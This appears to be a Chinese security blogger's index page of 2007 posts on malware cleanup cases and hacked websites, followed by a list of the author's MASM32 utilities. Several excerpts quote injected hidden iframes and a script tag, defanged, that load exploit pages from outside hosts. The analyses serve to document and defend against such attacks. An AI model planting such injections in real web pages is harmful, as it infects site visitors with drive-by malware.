- 博客(20)
- 资源 (53)
- 问答 (1)
- 收藏
- 关注
原创 某留学网站被植入利用 PPStream 堆栈漏洞的代码
某留学网站被植入利用 PPStream 堆栈漏洞的代码endurer 原创2007-09-30 第1版网站被植入代码:/---<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe> ---/hxxp://xxx.7**45*97**0.com/newdm/new05.ht
2007-09-30 17:57:00 1440
原创 用MASM32写了个系统托盘图标管理者 TrayIconMan
用MASM32写了个系统托盘图标管理者 TrayIconMan文件说明符 : F:/masm32/works/TrayIconMan/TrayIconMan.exe属性 : A---语言 : 中文(中国)文件版本 : 0.0.0001说明 : TrayIconMan | 系统托盘图标管理者版权 : PurpleEndurer备注 : 产品版本 : 0.0.0001产品名称 : TrayIc
2007-09-29 21:50:00 1731
原创 偶遇 BHDCRegC.exe, IEBHO.dll, IETool.dll 等
偶遇 BHDCRegC.exe, IEBHO.dll, IETool.dll 等 endurer 原创2007-09-28 第1版 一位网友说最近这几天他的电脑启动和运行很慢,让偶帮助检修。不过偶现在也很忙,让他下载 pe_xscan 扫描 log 发过我。分析 log,发现如下可疑项:/---pe_xscan 07-08-30 by Purple Endurer2007-
2007-09-29 13:22:00 2271
翻译 请注意隐藏击键记录设备的威胁
Be aware of the threat of hidden keystroke-logging devices请注意隐藏击键记录设备的威胁Date: September 20th, 2007日期: 2007-09-20Blogger: Mike Mullins博客:Mike Mullins翻译:endurer 2007-09-27 第1版Category: Spyware, Malw
2007-09-27 12:01:00 1543
原创 Win Vista 系统也中标?
Win Vista 系统也中标?endurer 原创2007-09-26 第1版中午一位网友说他电脑中的卡巴报告发现了病毒,请偶通过QQ远程协助再检查看看。网友的电脑是清华同方的,OS居然是Win Vista。下载 pe_xscan试了一上,能正常运行,扫描 log 并分析,发现如下可疑项:/===pe_xscan 07-08-30 by Purple Endurer2007-
2007-09-26 18:11:00 1583
原创 某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码endurer 原创2007-09-25 第1版在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:/---<script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></sc
2007-09-25 14:53:00 1987
原创 MASM32编程访问系统托盘区图标/07-09-29更新
;; FileName: TrayIcon.asm; Function: Demo the way to enum the icons in system tray; Author: Purple Endurer | 紫郢剑侠㊣ (PurpleEndurer@163.com); DevEnv: Win2000 pro SP4, MASM32 v8;; log; -----
2007-09-22 15:24:00 1721
原创 网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播
网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播endurer 原创2007-09-21 第1版一位网友发来 email 说他现在使用电脑浏览网页时,隔一段时间瑞星就会提示发现病毒:/---病毒名称 处理结果 发现日期 路径 文件Trojan.DL.Script.VBS.Agent.xgp 跳过
2007-09-21 18:12:00 2190
原创 偶遇 Trojan.PSW.Win32.OnlineGames.xym,Trojan.Win32.Agent.vvk等
偶遇 Trojan.PSW.Win32.OnlineGames.xym,Trojan.Win32.Agent.vvk等endurer 原创2007-09-19 第1版刚才一位网友说他的电脑最近启动一个程序所需时间比较长。让偶通过QQ远程协助检查。下载 pe_xscan 扫描 log 并分析,发现如下可疑项:/===pe_xscan 07-08-30 by Purple Endurer
2007-09-19 17:54:00 1468
原创 遭遇 Trojan.Win32.KillFiles.m, Packer.Mian007等
遭遇 Trojan.Win32.KillFiles.m, Packer.Mian007等endurer 原创2007-09-18 第1版刚才一位网友说他的电脑最近启动很慢,让偶通过QQ远程协助检查。下载 pe_xscan 扫描 log 并分析,发现如下可疑项:/===pe_xscan 07-08-30 by Purple Endurer2007-9-18 12:53:3Window
2007-09-18 15:42:00 3199
原创 遭遇 qfgsw.sys / Trojan-Downloader.Win32.Agent.bbb / Trojan.Win32.Agent.bvl等
遭遇 qfgsw.sys / Trojan-Downloader.Win32.Agent.bbb / Trojan.Win32.Agent.bvl等endurer 原创2007-09-17 第1版昨晚一位网友说近段时间他电脑中的 NOD32总报告:/---时间 模块 对象 名称 病毒 操作 用户名称 信息2007-9-16 21:30:22 AMON 文件 C:/WINDOWS/sys
2007-09-17 13:28:00 1567
原创 遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等2
遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等2endurer 原创2007-09-15 第2版 补充 Kaspersky 和 瑞星 的回复2007-09-14 第1版(继1)刚才通过QQ远程协助昨晚那位网友处理。发现网友电脑中的瑞星的病毒库还是 09-04 的,升级到最新病毒库后,瑞星监控不停地提
2007-09-14 23:48:00 2149 3
原创 遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等1
遭遇 kapjazy.dll,yhpri.dll,WinSys64.Sys,nwiztlbu.exe,myplayer.com 等1endurer 原创2007-09-14 第1版刚才一位网友说他的电脑中的360卫士不停的提示kapjazy.dll等程序要修改注册表,请偶帮助处理。不过偶这几天比较忙,让他下载 pe_xscan 扫描 log 发给我看看。在 log 中发现如下可疑项:/
2007-09-13 23:30:00 2014
原创 某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq
某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmqendurer 原创2007-09-12 第1版2007-09-13 第2版 补充瑞星对 server.exe 的回复网页包含代码:/---<iframe src="hxxp://www.be**a**utyco**nce*pt.cn/a
2007-09-12 20:58:00 1928
原创 用MASM32编写的免费程序 autoXrun beta2
用MASM32编写的免费程序 autoXrun beta2现在利用 U盘 等移动存储介质来传播,利用 autorun.inf 来启动的恶意程序越来越多了,autoXrun 就是为防范这些恶意程序而设计的。autoXrun 采用 MASM32 编写。文件说明符 : E:/masm32/works/autoXrun/autoXrun-beta2.exe属性 : A---获取文件版本信息大小
2007-09-09 23:18:00 1813 1
原创 09-07>pe_xscan 增加对计划任务的扫描
2007-09-07虽然目前使用 计划任务 的恶意程序不是很多,但不怕一万,就怕万一,还是加上了。
2007-09-07 23:24:00 1430 1
原创 某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exeendurer 原创2007-09-06 第1版网站页面被植入代码:/---<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0> ---/hxxp://www.h**l*bz.com/x*j***/Dns.htm 包
2007-09-06 22:33:00 1536
原创 偶遇 649453.sys / Adware.Cdn / Hacktool.Rootkit
偶遇 649453.sys / Adware.Cdn / Hacktool.Rootkitendurer 原创2007-09-04 第1版一位网友说最近他的电脑工作速度很慢,让偶通过QQ远程协助处理。下载 pe_xscan 扫描 log 并分析,只发现一个可疑项:/===pe_xscan 07-08-30 by Purple Endurer2007-9-4 20:58:58Window
2007-09-04 22:14:00 1395
原创 某论坛所用计数器利用 PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等
某论坛所用计数器利用 PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等endurer 原创2007-09-04 第1版刚才打开本地最近新建的一个网站的论坛时,Kaspersky 报告已检测 恶意程序 Exploit.HTML.IframeBof.检查网页代码,发现问题出在论坛所用的计数器上:/---<script langua
2007-09-03 18:20:00 2207
原创 文学论坛挂的马 Worm.Win32.QQPass.a 的简单分析
文学论坛挂的马 Worm.Win32.QQPass.a 的简单分析endurer 原创2007-09-02 第1版这回挂的跟 上回那个 Worm.Win32.Agent.imh (见:文学论坛挂的马 Worm.Win32.Agent.imh 的简单分析)很相似。0.exe 采用UPX1加壳脱壳前:文件说明符 : d:/test/0.exe属性 : A---获取文件版本信息大小失败!
2007-09-02 21:58:00 1234
用 HTML + JavaScript 打造的渐进式延迟法定退休年龄测算器
2024-09-15
免费图片浏览软件 IrfanView 64-bit 英文版
2024-06-30
MASM32编程通过WMI获取Windows用户帐户信息的控制台程序,小巧精炼,适合bat调用,重定向输出
2023-09-03
HTML+JavaScript+CSS DIY 分隔条splitter代码
2023-09-02
sysInfo(电脑系统信息)
2023-05-29
TcpStatC-增加显示PID和对应进程文件说明符
2022-08-14
TcpStatC.zip
2022-07-31
MASM32v11中的kernl32p.inc和kernl32p.lib存在bug,这是修正后的版本。
2022-07-30
MASM32v11版本中kernel32.inc和Kernel32.lib修正版。
2022-07-30
sysInfo-0_0_0001.zip
2021-11-04
Word启动故障修复程序FixWord
2017-01-16
MASM32编程实现运行时自动提示要求以管理员帐户来运行的演示源代码和exe
2017-01-05
用MASM32来DIY判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用lstrcmp,区分大小写)
2014-10-16
用MASM32来DIY一个判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用repe cmpsb指令,区分大小写)
2014-10-04
添加浮动按钮点击滚动到网页底部的纯JavaScript演示代码
2014-09-06
用MASM32写的 系统托盘图标管理员 TrayIconMan 0.0.0003
2012-02-17
定时关机、重启、注销、待机、修眠程序ClosePC 0.0.0.1 beta4
2011-08-04
用MASM32编写的网络时间同步/校正程序-adjTime.exe
2011-06-11
查看备份系统开/关机&用户登录/注销记录BootClos 0_0_0001_beta2
2011-05-26
BootClos 0.0.0001 beta1—查看、备份系统开关机记录
2011-05-21
DelUninstall_0_0_0001Beta4
2011-01-16
Speaker——用MASM32编写的文本朗读程序(7KB)
2010-07-24
MASM32编程通过WMI获取杀毒软件信息(源代码+exe)
2010-05-24
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
2010-04-19
用MASM32写的定时关机、重启、注销程序ClosePC 0.0.0.1beta1
2010-03-06
MASM32编程由WMI获取BIOS、主板、硬盘、CPU、网卡的信息(源代码+exe)
2009-10-21
FileInfo 0.0.0012
2009-10-09
DelUninstall_0_0_0001Beta3
2009-06-02
分析、获取命令行参数的MASM32演示程序
2009-04-16
IEFO_Man 0.0.0.1 beta1(映像劫持项目管理程序)
2009-03-03
MASM32编程获取任务栏高度
2008-09-21
FileInfo 0.0.0011
2008-07-17
FileInfo 0.0.0010 --修正bug,提升速度
2008-06-29
FileInfo 0.0.0009 -- 增强文件数字签名的检测
2008-06-09
FileInfo 0.0.0008
2008-05-31
Windows 10 计算器 显示的是多少?
2022-07-31
TA创建的收藏夹 TA关注的收藏夹
TA关注的人